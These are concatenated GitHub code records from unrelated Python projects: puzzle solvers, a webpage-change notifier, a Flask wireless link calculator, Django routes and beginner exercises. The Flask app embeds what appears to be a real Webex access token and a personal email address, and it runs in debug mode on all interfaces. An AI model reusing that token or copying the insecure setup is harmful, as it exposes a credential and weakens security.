p[Grain][side]\r\n\t\tif Farmer_present < farmer:\r\n\t\t\treturn False\r\n\t\tif Fox_present < fox:\r\n\t\t\treturn False\r\n\t\tif Chicken_present < chic:\r\n\t\t\treturn False\r\n\t\tif Grain_present < grain:\r\n\t\t\treturn False\r\n\t\t\r\n\t\tFarmer_Left = Farmer_present - farmer\r\n\t\tFox_Left = Fox_present - fox\r\n\t\tChicken_Left = Chicken_present - chic\r\n\t\tGrain_Left = Grain_present - grain \r\n\r\n\t\tif Farmer_Left != 0:\r\n\t\t\treturn False\r\n\t\tif Chicken_Left == 1 and Grain_Left == 1 and Farmer_Left == 0:\r\n\t\t\treturn False\r\n\t\tif Fox_Left == 1 and Chicken_Left == 1 and Farmer_Left == 0:\r\n\t\t\treturn False\r\n\r\n\t\tFarmer_arrives = p[Farmer][1-side] + farmer\r\n\t\tChicken_arrives = p[Chicken][1-side] + chic\r\n\t\tFox_arrives = p[Fox][1-side]+ fox\r\n\t\tGrain_arrives = p[Grain][1-side] + grain\r\n\t\t\r\n\t\tif Farmer_arrives != 1 : return False\r\n\r\n\t\treturn True\r\n\r\n\tdef move(self, farmer, fox, chic, grain):\r\n\t\tnewState = self.copy()\r\n\t\tside = self.d['boat']\r\n\t\tp = newState.d['people']\r\n\t\tp[Farmer][side] = p[Farmer][side]-farmer\r\n\t\tp[Fox][side] = p[Fox][side]-fox\r\n\t\tp[Chicken][side] = p[Chicken][side]-chic\r\n\t\tp[Grain][side] = p[Grain][side]-grain\r\n\r\n\t\tp[Farmer][1-side] = p[Farmer][1-side]+farmer\r\n\t\tp[Fox][1-side] = p[Fox][1-side]+fox\r\n\t\tp[Chicken][1-side] = p[Chicken][1-side]+chic\r\n\t\tp[Grain][1-side] = p[Grain][1-side]+grain\r\n\t\tnewState.d['boat'] = 1-side\r\n\t\treturn newState\r\n\r\ndef goal_test(s):\r\n p = s.d['people']\r\n return (p[Farmer][RIGHT] == 1 and p[Fox][RIGHT] == 1 and p[Chicken][RIGHT] == 1 and p[Grain][RIGHT] == 1)\r\n\r\ndef goal_message(s):\r\n\treturn \"Congratulations on successfully guiding the Farmer, Fox, Chicken and Grain across the river.\"\r\n\r\nclass Operator:\r\n\tdef __init__(self, name, precond, state_transf):\r\n\t\tself.name = name\r\n\t\tself.precond = precond\r\n\t\tself.state_transf = state_transf\r\n\r\n\tdef is_applicable(self, s):\r\n\t\treturn self.precond(s)\r\n\r\n\tdef apply(self, s):\r\n\t\treturn self.state_transf(s)\r\n\r\n#\r\n#\r\nCREATE_INITIAL_STATE = lambda : State(d={'people':[[1, 0], [1, 0], [1,0], [1,0]], 'boat':LEFT })\r\n#\r\n\r\n#\r\nFfcg_combinations = [(1,0,0,0), (1,1,0,0), (1,0,1,0), (1,0,0,1)]\r\n\r\nOPERATORS = [Operator(\"Cross the river with Farmer \" + \"taking \" + str(f) + \" fox, \" + str(c) + \" chicken, \" + \"and \" + str(g) + \" grain.\",\r\n\t lambda s, F1=Fam, f1=f, c1=c, g1=g: s.can_move(F1, f1, c1, g1),\r\n\t lambda s, F1=Fam, f1=f, c1=c, g1=g: s.move(F1, f1, c1, g1))\r\n \tfor (Fam, f, c, g) in Ffcg_combinations]\r\n #\r\n#\r\nGOAL_TEST = lambda s: goal_test(s)\r\n#\r\n#\r\nGOAL_MESSAGE_FUNCTION = lambda s: goal_message(s)\r\n# \t\r\n\r\n\r\n \t\r\n\r\n","repo_name":"vasumehra/Game-projects","sub_path":"vasum_Farmer_Fox.py","file_name":"vasum_Farmer_Fox.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11172883995","text":"import requests\nimport argparse\nimport time\nimport os\nimport smtplib, ssl\nimport asyncore\nimport smtplib\nimport smtpd\nimport datetime\nimport winsound\n\ndef check_page(webpage, email):\n starttime = time.time()\n initial_contents = requests.get(webpage).content\n while True:\n response = requests.get(webpage)\n contents = response.content\n if response.status_code != 200:\n print(\"I can't get to the page. 
The webpage appears to be down!\")\n if contents == initial_contents:\n time.sleep(60.0 - ((time.time() - starttime) % 30.0))\n continue\n else:\n print(contents)\n print(\"hmmmm\")\n print(initial_contents)\n make_sound()\n send_email(webpage = webpage , email = email)\n break\n time.sleep(60.0 - ((time.time() - starttime) % 30.0))\n\ndef make_sound():\n frequency = 2500 # Set Frequency To 2500 Hertz\n duration = 2000 # Set Duration To 1000 ms == 2 second\n winsound.Beep(frequency, duration)\n\ndef send_email(webpage ,email):\n fromaddr = \"test@domain.org\"\n toaddrs = [email]\n \n # Add the From: and To: headers at the start!\n msg = \"Hello, it looks like there was a change to the registration page. It may have opened up\"\n \n\n print(\"Message length is\", len(msg))\n with smtplib.SMTP(host = \"localhost\", port = 25) as smtp:\n smtp.sendmail(fromaddr, toaddrs, msg)\n smtp.quit()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-w', '--webpage',help=\"Webpage to check for every 30 seconds. Ex: https://google.com\", type = str, required = True)\n parser.add_argument('-e', '--email', help=\"Email to send notification to. Be sure to check you spam folder. Ex: abc123@gmail.com\", required = True)\n arguments = parser.parse_args()\n make_sound()\n print(\"Testing sound level. Turn up your volume if you didn't hear anything!\")\n #send_email(arguments.webpage,arguments.email)\n check_page(webpage = arguments.webpage, email = arguments.email)\n\nif __name__ == '__main__':\n main()","repo_name":"aalsabag/registration-notify","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42737669598","text":"from flask import Flask, render_template, request, redirect\nimport json, os, webexteamssdk\nfrom dotenv import load_dotenv\n\nimport radio1\nimport radio2\n\n# load all environment variables\nload_dotenv()\n\n# Global variables\napp = Flask(__name__)\n\ndef get_json(filename):\n with open(filename ,'r') as f:\n return json.load(f)\n\ndef write_json(data, filename):\n with open(filename ,'w') as f:\n json.dump(data, f, indent=2)\n\n## Routes\n\n#Index\n@app.route('/', methods=[\"GET\",\"POST\"])\ndef index():\n if request.method == \"GET\":\n try:\n # Page without error message and defined header links \n return render_template('settings.html', settings = get_json('settings.json'), devices = get_json('devices.json'), antennas = get_json('antennas.json'), cables = get_json('cables.json'), hiddenLinks=True)\n except Exception as e: \n print(e)\n return render_template('settings.html', settings = get_json('settings.json'), devices = get_json('devices.json'), antennas = get_json('antennas.json'), cables = get_json('cables.json'), hiddenLinks=True)\n else:\n # try:\n freq = request.form.get('frequency')\n\n settings = {\n 'rxdevice' : request.form.get('rxdevice'),\n 'txdevice' : request.form.get('txdevice'),\n 'rxcable' : request.form.get('rxcable'),\n 'rxantenna' : request.form.get('rxantenna'),\n 'txcable' : request.form.get('txcable'),\n 'txantenna' : request.form.get('txantenna'),\n 'frequency' : freq,\n 'desiredrange' : float(request.form.get('range'))/1.609,\n 'desiredrate' : int(request.form.get('datarate')),\n 'domain' : request.form.get('domain'),\n 'bandwidth' : request.form.get('bandwidth'),\n 'channel' : request.form.get('channel'),\n 'height1' : int(request.form.get('height1')),\n 'height2' : 
int(request.form.get('height2'))\n }\n\n metrics = []\n if freq == \"2.4ghz\":\n metrics = radio1.get_metrics(settings)\n else:\n metrics = radio2.get_metrics(settings)\n\n return render_template('settings.html', settings = get_json('settings.json'), devices = get_json('devices.json'), antennas = get_json('antennas.json'), cables = get_json('cables.json'), hiddenLinks=True, calculated = True, metrics = metrics)\n # except Exception as e: \n # print(e) \n # return render_template('settings.html', settings = get_json('settings.json'), devices = get_json('devices.json'), antennas = get_json('antennas.json'), cables = get_json('cables.json'), hiddenLinks=True, error=True, errormessage=\"Make sure either the range- or rate-field is non-zero.\", errorcode=e)\n\n@app.route('/add-device', methods=[\"GET\",\"POST\"])\ndef add_device():\n if request.method == \"POST\":\n device = {\n \"2.4ghz\": {\n \"spatial-streams\" : int(request.form.get('ss1')),\n \"mcs-limit\" : int(request.form.get('mcs1')),\n \"beamforming\" : int(request.form.get('bf1')),\n \"tx-ss\" : int(request.form.get('txss1')),\n \"rx-ss\" : int(request.form.get('rxss1')),\n \"noise-figure\" : int(request.form.get('nf1')),\n \"builtin-antenna\" : request.form.get('bi1'),\n \"PL\": {\n \"PL1\" : int(request.form.get('pl11')),\n \"PL2\" : int(request.form.get('pl21')),\n }\n },\n \"5ghz\": {\n \"spatial-streams\" : int(request.form.get('ss2')),\n \"mcs-limit\" : int(request.form.get('mcs2')),\n \"beamforming\" : int(request.form.get('bf2')),\n \"tx-ss\" : int(request.form.get('txss2')),\n \"rx-ss\" : int(request.form.get('rxss2')),\n \"noise-figure\" : int(request.form.get('nf2')),\n \"builtin-antenna\" : request.form.get('bi2'),\n \"PL\": {\n \"PL1\" : int(request.form.get('pl12')),\n \"PL2\" : int(request.form.get('pl22')),\n }\n }\n }\n name = request.form.get('model')\n devices = get_json('devices.json')\n devices[name] = device\n write_json(devices, 'devices.json')\n send_files_on_webex()\n return redirect('/p2ptool/')\n\n return render_template('add_device.html', antennas=get_json('antennas.json'))\n\n@app.route('/add-antenna', methods=[\"GET\",\"POST\"])\ndef add_antenna():\n if request.method == \"POST\":\n frequency = request.form.get('frequency')\n gain = int(request.form.get('gain'))\n model = request.form.get('model')\n antennas = get_json('antennas.json')\n antennas[frequency][model] = gain\n write_json(antennas, 'antennas.json')\n send_files_on_webex()\n return redirect('/p2ptool/')\n\n return render_template('add_antenna.html')\n\n@app.route('/add-cable', methods=[\"GET\",\"POST\"])\ndef add_cable():\n if request.method == \"POST\":\n frequency = request.form.get('frequency')\n loss = int(request.form.get('loss'))\n name = request.form.get('name')\n cables = get_json('cables.json')\n cables[frequency][name] = loss\n write_json(cables, 'cables.json')\n send_files_on_webex()\n return redirect('/p2ptool/')\n\n return render_template('add_cable.html')\n\ndef send_files_on_webex():\n token = \"ZTJhNDNjNDktM2E5MC00MWI3LTk2YTktMDFjNTM3ZDY1MWQwMDE1ODI4Y2QtOGU3_PF84_1eb65fdf-9643-417f-9974-ad72cae0e10f\"\n api = webexteamssdk.WebexTeamsAPI(access_token=token)\n api.messages.create(toPersonEmail=\"stienvan@cisco.com\", files=[os.path.abspath(\"antennas.json\")])\n api.messages.create(toPersonEmail=\"stienvan@cisco.com\", files=[os.path.abspath(\"devices.json\")])\n api.messages.create(toPersonEmail=\"stienvan@cisco.com\", files=[os.path.abspath(\"cables.json\")])\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5678, 
debug=True)","repo_name":"gve-sw/gve_devnet_wireless_link_calculator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15958469426","text":"from django.urls import path\nfrom .views import formulariop, home, login, formulariop, reuniones, sede, carrera, alumnos, entrevistas, tus_reuniones\n\nurlpatterns = [\n path('', login, name=\"login\"),\n path('home', home, name=\"home\"),\n path('formulariop', formulariop, name=\"formulariop\"),\n path('sede', sede, name=\"sede\"),\n path('carrera', carrera, name=\"carrera\"),\n path('alumnos', alumnos, name=\"alumnos\"),\n path('entrevistas', entrevistas, name=\"entrevistas\"),\n path('reuniones', reuniones, name=\"reuniones\"),\n path('tus_reuniones', tus_reuniones, name=\"tus_reuniones\"),\n]","repo_name":"LucasRC20/academic_advisor","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20351763914","text":"import sys\nimport heapq\ninput = sys.stdin.readline\n\n\ndef coin(k, coinList):\n dp = [0]*(k+1)\n # Basecase\n # 같은 배열을 재활용 하므로 0만 채워주면 된다.\n dp[0] = 1\n\n # 모든 코인의 경우를 다 확인 할때까지 반복\n for i in range(1, n+1):\n # 같은 배열을 재활용 하므로 현재 코인을 사용할 수 있는 경우부터 확인하면 된다.\n for j in range(coinList[i], k+1):\n # 점화식 : dp[i][j] = dp[i-1][j] + dp[i][j-coin[i]]\n # 같은 배열 재활용 하므로 그냥 이전의 배열의 경우를 그대로 더해주면 된다.\n dp[j] = dp[j] + dp[j-coinList[i]]\n\n return dp[k]\n\n\nif __name__ == \"__main__\":\n n, k = map(int, input().strip().split())\n coinList = [0]\n for _ in range(n):\n heapq.heappush(coinList, int(input().strip()))\n\n print(coin(k, coinList))\n","repo_name":"Alphanewbie/TIL","sub_path":"Algorithm_problem_solving/Baek-joon/2293/2293.py","file_name":"2293.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69956095528","text":"import unittest\nfrom urllib import urlopen\n\nimport manuallabour.core.common as common\nfrom manuallabour.core.stores import *\n\nclass TestStores(unittest.TestCase):\n def test_localmemory(self):\n m = LocalMemoryStore()\n\n self.assertFalse(m.has_obj('asdf'))\n m.add_obj(common.Object(obj_id='asdf',name='FooBar'))\n self.assertTrue(m.has_obj('asdf'))\n self.assertEqual(m.get_obj('asdf').name,'FooBar')\n\n self.assertEqual(len(list(m.iter_obj())),1)\n\n m.add_blob('asg','tests/test_stores.py')\n\n def test_blobs(self):\n store = LocalMemoryStore()\n\n self.assertFalse(store.has_blob('afgda'))\n\n store.add_blob('afgda','tests/test_stores.py')\n\n self.assertTrue(store.has_blob('afgda'))\n\n fid = urlopen(store.get_blob_url('afgda'))\n fid.close()\n\n def test_add_objects(self):\n store = LocalMemoryStore()\n\n store.add_obj(common.Object(obj_id='a',name=\"Nut\"))\n store.add_obj(common.Object(obj_id='b',name=\"Wrench\"))\n store.add_obj(common.Object(obj_id='c',name=\"Bolt\"))\n blt = common.Object(obj_id='d',name=\"Tightened NutBolt\")\n store.add_obj(blt)\n\n self.assertTrue(store.has_obj('a'))\n self.assertFalse(store.has_obj('f'))\n self.assertEqual(blt,store.get_obj('d'))\n self.assertEqual(len(list(store.iter_obj())),4)\n\n self.assertRaises(KeyError,\n lambda: store.add_obj(\n (common.Object(obj_id='a',name=\"Smaller Nut\"))\n )\n 
)\n","repo_name":"jreinhardt/manual-labour","sub_path":"tests/test_stores.py","file_name":"test_stores.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24530864583","text":"# Programa principal, onde as funções criadas como módulo são usadas\r\n\r\nfrom arquiv import *\r\nfrom menu import *\r\n\r\n\r\nlista_principal = [\"Ver pessoas cadastradas\", \"Cadastrar nova Pessoa\", \"Sair do Sistema\"]\r\narquivo = 'desafio115.txt'\r\n\r\nif not arquivo_existe(arquivo):\r\n criar_arquivo(arquivo)\r\n\r\n\r\nwhile True:\r\n resp = layout(lista_principal)\r\n if resp == 1:\r\n ler_arquivo(arquivo)\r\n elif resp == 2:\r\n cabecalho(\"NOVO CADASTRO\")\r\n nome = str(input(\"Nome: \"))\r\n idade = int(input(\"Idade: \"))\r\n cadastro(arquivo, nome, idade)\r\n elif resp == 3:\r\n cabecalho(\"Saindo do sitema\")\r\n break\r\n else:\r\n print('\\033[31mERRO: Digite uma opção válida!\\033[m')\r\n","repo_name":"davi12345452/ExercisesPython","sub_path":"desafio115/sistema.py","file_name":"sistema.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17514569867","text":"class Heuristic3:\n def __init__(self, current, goal):\n self._current = current\n self._goal = goal\n self.heuristic_value = -1\n\n @staticmethod\n def __calc_dist__(p1, p2):\n (x1, y1) = p1\n (x2, y2) = p2\n return abs(x1 - x2) + abs(y1 - y2)\n\n def calc(self):\n if self.heuristic_value < 0:\n self.heuristic_value = 0\n if not hasattr(self._goal, 'dic_goal'):\n self._goal.dic_goal = {}\n\n for i in range(0, self._current.size * self._current.size):\n self._goal.dic_goal[self._goal.get_value(i // 4, i % 4)] = (i // 4, i % 4)\n\n for i in range(0, self._current.size * self._current.size):\n self.heuristic_value += self.__calc_dist__(\n self._goal.dic_goal[self._current.get_value(i // 4, i % 4)],\n (i // 4, i % 4)\n )\n\n return self.heuristic_value\n","repo_name":"EduardoShibukawa/UEM","sub_path":"MOA/Puzzle15/Heuristic/Heuristic3.py","file_name":"Heuristic3.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26629841892","text":"mapping = {\n \"ECG_HR\": \"ecgHr\",\n \"NIBP_Systolic\": \"nibpSystolic\",\n \"NIBP_Diastolic\": \"nibpDiastolic\",\n \"NIBP_Mean\": \"nibpMean\",\n \"SpO2\": \"spo2\",\n \"ET_CO2\": \"etCo2\",\n \"AA_ET\": \"aaEt\",\n \"AA_FI\": \"aaFi\",\n \"AA_MAC_SUM\": \"aaMacSum\",\n \"Agent_AA\": \"agentAa\",\n \"O2_FI\": \"o2Fi\",\n \"N2O_FI\": \"n2OFi\",\n \"N2O_ET\": \"n2OEt\",\n \"CO2_RR\": \"co2Rr\",\n \"T1_Temp\": \"t1Temp\",\n \"T2_Temp\": \"t2Temp\",\n \"P1_HR\": \"p1Hr\",\n \"P1_Systolic\": \"p1Systolic\",\n \"P1_Disatolic\": \"p1Disatolic\",\n \"P1_Mean\": \"p1Mean\",\n \"P2_HR\": \"p2Hr\",\n \"P2_Systolic\": \"p2Systolic\",\n \"P2_Diastolic\": \"p2Diastolic\",\n \"P2_Mean\": \"p2Mean\",\n \"PPeak\": \"ppeak\",\n \"PPlat\": \"pplat\",\n \"TV_Exp\": \"tvExp\",\n \"TV_Insp\": \"tvInsp\",\n \"PEEP\": \"peep\",\n \"MV_Exp\": \"mvExp\",\n \"Compliance\": \"compliance\",\n \"RR\": \"rr\",\n \"ST_II\": \"stIi\",\n \"ST_V5\": \"stV5\",\n \"ST_aVL\": \"stAvl\",\n \"EEG_Entropy\": \"eegEntropy\",\n \"EMG_Entropy\": \"emgEntropy\",\n \"BSR_Entropy\": \"bsrEntropy\",\n \"BIS\": \"bis\",\n \"BIS_BSR\": \"bisBsr\",\n \"BIS_EMG\": \"bisEmg\",\n \"BIS_SQI\": 
\"bisSqi\",\n}","repo_name":"andybak/VsServer","sub_path":"web/gisdrf/vscapture/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"393865741","text":"'''\n生成图片\n'''\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nimport numpy as np\n\ndatagen = ImageDataGenerator(\n rotation_range=40,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode='nearest')\n\ndatagen = ImageDataGenerator()\n\nimg = load_img('datu-1.jpg') # this is a PIL image\nx = img_to_array(img) # this is a Numpy array with shape (3, 150, 150)\nx = x.reshape((1,) + x.shape) # this is a Numpy array with shape (1, 3, 150, 150)\n\n# the .flow() command below generates batches of randomly transformed images\n# and saves the results to the `preview/` directory\ni = 0\ny = np.array(['1'],dtype='int')\n\n\n#============================================================\n'''\ny = None batch is (1, 340, 260, 3) numpy\ny != None batch[0] is (1, 340, 260, 3) numpy batch[1] (1,)\n'''\nfor batch in datagen.flow(x,y,batch_size=1,\n save_to_dir='test', save_prefix='cat', save_format='jpeg'):\n print(type(batch))\n print(batch[0].shape)\n print(batch[1].shape)\n i += 1\n if i > 1:\n break # otherwise the generator would loop indefinitely\n#============================================================\n\n#============================================================\n# for batch,label in datagen.flow_from_directory('test',target_size=(150, 150),batch_size=1):\n# print(type(batch))\n# print(type(label))\n# i += 1\n# if i > 1:\n# break\n#============================================================","repo_name":"spiolynn/keras_learning_","sub_path":"temp/generater_pic.py","file_name":"generater_pic.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5520136876","text":"\"\"\"Data model for floor\"\"\"\n\nfrom .thing import Thing\n\n\nclass Floor(Thing):\n \"\"\"Floor model class\"\"\"\n\n def __init__(self, name, level, building_id, kind, description=None,\n spatial_info=None, *, id=None):\n super().__init__(id=id)\n self.name = name\n self.kind = kind\n self.level = level\n self.spatial_info = spatial_info\n self.description = description\n self.building_id = building_id\n","repo_name":"HIT2GAP-EU-PROJECT/bemserver","sub_path":"app/bemserver/models/floor.py","file_name":"floor.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"53"} +{"seq_id":"9887217327","text":"from dagster import Definitions, load_assets_from_modules\nfrom dagster_test.toys.partitioned_assets import hourly_and_daily_and_unpartitioned\n\n\ndef test_assets():\n defs = Definitions(assets=load_assets_from_modules([hourly_and_daily_and_unpartitioned]))\n for job_name in defs.get_repository_def().get_implicit_asset_job_names():\n job_def = defs.get_job_def(job_name)\n partition_key = job_def.partitioned_config.partitions_def.get_partition_keys()[0]\n assert 
job_def.execute_in_process(partition_key=partition_key).success\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster-test/dagster_test_tests/toys_tests/partitioned_assets_tests/test_hourly_and_daily_and_unpartitioned.py","file_name":"test_hourly_and_daily_and_unpartitioned.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"17820183391","text":"from .utils import get_var_function\n\nfrom array import array\n\n# logging\nimport logging\nlogger = logging.getLogger(__name__)\n\n\n#===================================================================================================\ndef get_binning_single_variable(variable, binning_dict, binning_opt=None):\n \"\"\"Retrieve binning for a single variable looking for the binning inside binning_dict\n\n Args:\n variable (str): name of the variable\n\n Returns:\n tuple: tuple containing the number of bins as the first element, and the second and third are\n the variable limits\n \"\"\"\n variable_addon = ''\n\n if 'coarse' == binning_opt:\n variable_addon = '__COARSE'\n\n binning = binning_dict.get(variable+variable_addon, None)\n if binning is None and 'coarse' == binning_opt:\n logger.warning(f'Getting nominal binning for {variable}. COARSE binning not found')\n binning = binning_dict.get(variable, None)\n\n\n if binning is None and '[' in variable and ']' in variable:\n binning = binning_dict.get(variable[:variable.index('[')], None)\n\n if variable is None:\n for var in binning_dict.keys():\n if var in variable:\n binning = binning_dict[var]\n break\n\n if binning is None:\n try:\n binning = binning_dict.get(variable.split('_')[1], None)\n except:\n binning = None\n\n if binning is None:\n try:\n binning = binning_dict.get(variable.split('_')[0], None)\n except:\n binning = None\n\n if binning is None and 'dphi' in variable:\n binning = binning_dict.get('dphi', None)\n \n if binning is None and '/' in variable:\n binning = binning_dict.get(variable.split('/')[0], None)\n \n if binning is None and '*' in variable:\n binning = binning_dict.get(variable.split('/')[0], None)\n\n return binning\n#===================================================================================================\n\n#===================================================================================================\ndef get_binning(variable, binning_dict, binning_opt=None):\n \"\"\"Get the variable for a single variable or a combination of two of them.\n\n Args:\n variable (str): variable or variables, separated by :\n\n Returns:\n tuple: tuple containing the number of bins as the first element, and the second and third are\n the variable limits\n \"\"\"\n # in case the variable contains two variables instead\n if ':' in variable and not '::' in variable:\n varx, vary = variable.split(':')\n\n binning_x = get_binning_single_variable(get_var_function(varx), binning_dict, binning_opt)\n binning_y = get_binning_single_variable(get_var_function(vary), binning_dict, binning_opt)\n\n if len(binning_x) > 3:\n binning_x = array('d', binning_x)\n if len(binning_y) > 3:\n binning_y = array('d', binning_y)\n\n binning = [binning_x, binning_y]\n else:\n binning = get_binning_single_variable(variable, binning_dict, binning_opt)\n\n if binning is None:\n logger.error('Binning is not configured for this variable %s. Using default binning instead.' 
% variable)\n binning = binning_dict['default']\n\n return binning\n#===================================================================================================\n","repo_name":"franciscosili/utils","sub_path":"binningutils.py","file_name":"binningutils.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25009332091","text":"# 1 - masala.\n# 1. o'quvchilar ro'yhatini e'lon qiling unga oxiriga yangi o'quvchi qo'shing (print qiling) append\n# 2. keyin o'rtasiga yangi o'quvchi qo'shing (print qiling) insert\n# 3. o'quvchilar sonini toping (print qiling) len\n# 4. o'quvchilar ro'yhatiga yana bor ismlardan birini kiriting\n# va shu ismli o'quvchi nechtaligini toping (print qiling) append yoki insert , count\n# 5. yangi o'quvchilar ro'yhatini e'lon qilib eski ro'yhatga ulang\n# va eski ro'yhatni (print qiling) extend\n# 6. ixtiyoriy o'quvchini indeksini topib bering (print qiling) index\n# 7. ro'yhatni tozalang (print qiling) clear\n\n# maxsus masala 1. ro'yhat berilgan. input qilingan yangi o'zgaruvchini input qilingan\n# yangi indeksga insert metodisiz joylashtiring\n# masalan:\n# sonlar = [1, 2, 3, 4] bo'lsin\n# input -> element = 10, index = 2\n# javobi ikkinchi indeksga 10 degan son kiritilsin\n# sonlar = [1, 2, 10, 3, 4]\n\nsonlar = [1, 2, 3, 4, 5, 6]\n\nprint(sonlar)\nfor son in sonlar:\n if son % 2 == 0:\n sonlar[sonlar.index(son)] = son * 2\n elif son % 2 == 1:\n print(sonlar.index(son))\n sonlar[sonlar.index(son)] = son ** 2\n\nprint(sonlar)\n\n# 5 - masala\n# raqamini kiritasiz va shu indeksgacha fibonachi sonlar ro'yhatini tuzasiz\n# fibonachi sonlari -> 1, 1, 2, 3, 5, 8, 13, 21 ...\n\nindeks = int(input(\"=>\"))\n\na = []\n\nfor i in range(indeks + 1):\n if i == 0 or i == 1:\n a.append(1)\n else:\n a.append(a[i - 1] + a[i - 2])\n\nprint(a)\n\n# 6 - masala. ro'yhat berilgan. 
Har bir elementini o'zidan keyingi elementiga almashtiring.\n# oxirgi elementni nolga tenglang\n\na = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nfor i in range(len(a)):\n if i == len(a) - 1:\n a[i] = 0\n else:\n a[i] = a[i + 1]\nprint(a)\n\n","repo_name":"OybekNarzullaev/Python_darslari2","sub_path":"examp1.py","file_name":"examp1.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"uz","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22461347949","text":"# importing some modules\nimport os\nfrom collections import Counter\nfrom ctypes import *\n\n\n# change directory\ndrive = input(\n \"Enter which drive you want to search :\\n[C, D, E, F or G]\\nDrive: \")\nndrive = drive+\":\\\\\"\nos.chdir(ndrive)\nprint(\"Your'r current directory is\", os.getcwd()) # \"F:\\\\\"\nspecific_folder = input(\"Any specific_folder :\\n\")\nif specific_folder in ['no', \"NO\", \"No\"]:\n drive = ndrive\nelse:\n drive = f\"{drive}:\\{specific_folder}\\\\\"\n\nprint(drive)\n# defining some global variables\nsave = []\ncopyed = []\nremoved_from = []\ncount = 0\ncounter = []\n\n# getting all the files\nfor path, folder, files in os.walk(drive):\n # print(\"current path: \"+ path)\n # spl = path.split('\\\\',',')\n # print('current folders: ' , folder)\n save += files\n\n\n# counting all the duplicate files\n\njack = Counter(save)\n# print(jack.values())\n\n\ndef if_in_dup():\n global jack\n for a, b in jack.items():\n # print(a,b)\n if b == 2:\n copyed.append(a)\n # print(copyed)\n\n# printing coped items\n\n\ndef count_copy():\n global count\n global counter\n global copyed\n if copyed == []:\n print(\"You've no duplicate files in you dirs\")\n else:\n for i in copyed:\n count += 1\n counter.append(f\"{count}.{i}\")\n # print(\"=========================\")\n\n# messagebox.showinfo(\"Information\",\"Informative message\")\n\n\ndef show_copy():\n global count\n global counter\n if windll.user32.MessageBoxW(0, f\"You've {count} copyed files!\", \"Copyed Files\", 1) == 1:\n for i in counter:\n windll.user32.MessageBoxW(0, f\"{i}\", \"Files\", 1)\n else:\n windll.user32.MessageBoxW(0, \"Thank You\", \"Thanks\", 1)\n# final part\n\n\ndef removing():\n global drive\n global copyed\n global removed_from\n permission = input(\n \"If you want to delete those files\\nType 'Yes'\\nelse Type 'No'\\nType Here :\")\n if permission in [\"Yes\", \"yes\", \"YES\"]:\n\n # if_in_dup()\n for path, folder, files in os.walk(drive):\n for i in files:\n if i in copyed:\n removed_from.append(path+'\\\\'+i)\n os.chdir(path)\n os.remove(i)\n copyed.remove(i)\n print(\"Task complete\")\n elif permission in [\"No\", \"no\", \"NO\"]:\n print(\"Thank you. 
\\nWe didn't remove anything from this path!\")\n else:\n print(\"try again\")\n permission = input(\"Write Yes or No\\n\")\n\n\n'''def duplicate_or_not():\n if copyed == []:\n print(\"You've no duplicate files in you dirs\")\n else:\n print(f\"You have some Duplicate files in this dir--> {copyed}\")\n\nduplicate_or_not()'''\n\n\ndef run():\n if_in_dup()\n count_copy()\n show_copy()\n removing()\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"RomjanHossain/Remove-Copy","sub_path":"remove_COpY.py","file_name":"remove_COpY.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7086308631","text":"# Given an array with n integers, your task is to check if \n# it could become non-decreasing by modifying at most 1 element.\n# We define an array is non-decreasing if array[i] <= array[i + 1] \n# holds for every i (1 <= i < n).\n\n\nclass Solution:\n def checkPossibility(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n index = None\n for i in range(len(nums)-1):\n if nums[i]>nums[i+1]:\n if index is not None: # more than one \n return False\n index = i\n \n return (index is None or index==0 or index ==len(nums)-2 or \n nums[index-1]<=nums[index+1] or 